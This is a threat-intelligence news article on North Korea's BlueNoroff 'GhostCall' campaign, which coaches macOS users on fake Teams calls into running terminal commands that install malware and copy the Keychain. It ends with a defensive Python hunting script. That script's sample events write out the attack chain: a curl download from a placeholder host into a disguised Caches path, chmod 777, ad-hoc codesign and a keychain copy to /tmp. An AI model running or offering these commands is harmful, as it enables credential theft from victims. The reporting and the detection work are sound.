A routine business call turned into a nightmare for one macOS user after North Korean state-sponsored hackers used a clever “audio issue” ruse to compromise their machine. A new investigation by Daylight Security has linked this sophisticated social engineering attack to BlueNoroff, a financially motivated subgroup of the notorious Lazarus Group.
The campaign targets professionals in the cryptocurrency and financial sectors, luring them from messaging apps into high-pressure video meetings where the “fix” for a technical glitch is actually a command to install malware.
The attack begins innocuously enough. The adversary initiates contact on platforms like Telegram, posing as a potential customer or partner. Once trust is established, they steer the victim toward a Microsoft Teams call.
It is here that the trap is sprung. During the meeting, the attacker feigns technical difficulties, claiming they cannot hear the victim.
“The attacker claimed audio issues and coached the victim into running terminal commands that downloaded and executed malicious binaries,” the report explains.
Under the guise of troubleshooting, the victim is tricked into pasting a malicious script into their terminal. This “fix” doesn’t repair the audio; instead, it downloads a payload disguised as a system cache file.
The malware is designed to blend in perfectly with the macOS environment. The victim’s host downloads an executable to a path designed to look benign: /Library/Caches/com.apple.sys.receipt.
Once the file is on disk, the actor relies on tools already present on macOS rather than bringing custom utilities (a “living off the land” approach): the download is made executable and given an ad-hoc code signature. An ad-hoc signature carries no Apple-issued identity and does not satisfy Gatekeeper or notarization; what it does is satisfy the Apple silicon requirement that native code carry some signature before it will run, while making the file look more ordinary on inspection. Gatekeeper was likely never consulted anyway, since a file fetched from the command line typically lacks the com.apple.quarantine attribute that triggers it.
“Immediately after download, the actor made the file executable (chmod 777) and used ad-hoc signing to make the file appear more ‘normal’,” Daylight Security notes.
The ultimate goal of this operation is clear: credential theft. Once established, the malware goes straight for the user’s most sensitive data repository—the Keychain.
The investigation observed the malware copying the user’s login Keychain database, which stores passwords for applications, Wi-Fi networks and encrypted disk images. The copied file is itself encrypted with the user’s login password, so it yields nothing on its own; the attacker still has to obtain that password separately or crack it offline.
“Credential theft was directly observed via copies of the user’s Keychain database,” the report states, citing the command: cp -rf …/login.keychain-db /tmp/<staging_dir>.
Additionally, the malware targeted “secondary components,” executing a hidden file disguised within a temporary iCloud sync application path to ensure persistence.
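The command chain reported above (a download into the Caches path, chmod 777, ad-hoc codesign, then a cp of login.keychain-db into /tmp) is narrow enough to hunt for in endpoint telemetry. The following Python is an added example, not tooling from Daylight Security or anything described in the report. It assumes process events exported as JSON lines with ts, user and cmd fields (an assumption; adapt the parser to whatever your EDR produces), and the sample events are constructed. It scores per-user hits inside a time window and only alerts on two or more distinct stages, so a developer’s lone codesign or chmod +x does not fire.

```python
"""Hunt for the GhostCall-style macOS command chain in process telemetry.

Added example, not tooling from Daylight Security or the report. The input
format (JSON lines with "ts", "user", "cmd") is an assumption; the sample
events below are constructed, not captured from a real incident.
"""
import json
import re
from collections import defaultdict

# One regex per stage of the reported chain. Paths and flags follow the
# article: Caches path, chmod 777, ad-hoc signing, keychain copy to /tmp.
RULES = {
    "download_to_caches": re.compile(r"\b(curl|wget)\b.*\s-[oO]\s*/Library/Caches/"),
    "chmod_world_exec":   re.compile(r"\bchmod\s+(777|a?\+x)\s+/Library/Caches/"),
    "adhoc_codesign":     re.compile(r"\bcodesign\b.*\s(-s|--sign)\s+-(\s|$)"),
    "keychain_copy":      re.compile(r"\bcp\b.*login\.keychain-db\b.*\s/tmp/"),
}

# Constructed sample telemetry (host, users and the TEST-NET address are
# made up). "alice" reproduces the reported chain; "bob" is ordinary
# developer activity that uses some of the same tools.
SAMPLE_EVENTS = """\
{"ts": 1000, "user": "alice", "cmd": "curl -fsSL http://203.0.113.7/r -o /Library/Caches/com.apple.sys.receipt"}
{"ts": 1004, "user": "alice", "cmd": "chmod 777 /Library/Caches/com.apple.sys.receipt"}
{"ts": 1009, "user": "alice", "cmd": "codesign -s - /Library/Caches/com.apple.sys.receipt"}
{"ts": 1010, "user": "bob",   "cmd": "codesign -s 'Developer ID Application: Example Corp' build/App.app"}
{"ts": 1011, "user": "bob",   "cmd": "chmod +x ./scripts/run.sh"}
{"ts": 1130, "user": "alice", "cmd": "cp -rf /Users/alice/Library/Keychains/login.keychain-db /tmp/.x1/"}
"""


def parse_events(text):
    """Parse JSON-lines telemetry into dicts; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(cmd):
    """Return the set of chain stages a single command line matches."""
    return {name for name, rx in RULES.items() if rx.search(cmd)}


def find_chains(events, window=900, min_stages=2):
    """Return {user: [stages]} for users whose matched commands cover at
    least `min_stages` distinct stages inside some `window`-second span.

    Requiring more than one stage is what keeps a developer's lone
    `codesign` or `chmod +x` from alerting on its own.
    """
    hits = defaultdict(list)
    for ev in events:
        stages = classify(ev["cmd"])
        if stages:
            hits[ev["user"]].append((ev["ts"], stages))

    alerts = {}
    for user, user_hits in hits.items():
        user_hits.sort(key=lambda h: h[0])
        best = set()
        # Slide a window starting at each hit and keep the widest stage set.
        for i, (t0, _) in enumerate(user_hits):
            seen = set()
            for t, stages in user_hits[i:]:
                if t - t0 > window:
                    break
                seen |= stages
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_stages:
            alerts[user] = sorted(best)
    return alerts


if __name__ == "__main__":
    for user, stages in find_chains(parse_events(SAMPLE_EVENTS)).items():
        print(f"ALERT user={user} stages={', '.join(stages)}")
```

Run against the constructed sample, only alice is reported, with all four stages; bob’s Developer ID signing and chmod on a script path match nothing. Tighten the window to 60 seconds and the keychain copy at ts 1130 drops out of alice’s chain, which is the trade-off to tune against real dwell times on your fleet.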
This “GhostCall” tactic is a hallmark of BlueNoroff, a group infamous for its revenue-generating operations targeting Web3 and financial organizations. By moving victims from text chats to live video calls, they increase the psychological pressure and lower the victim’s guard.
“From a threat intelligence perspective, this activity is consistent with the GhostCall campaign pattern publicly attributed to BlueNoroff,” Daylight Security concludes.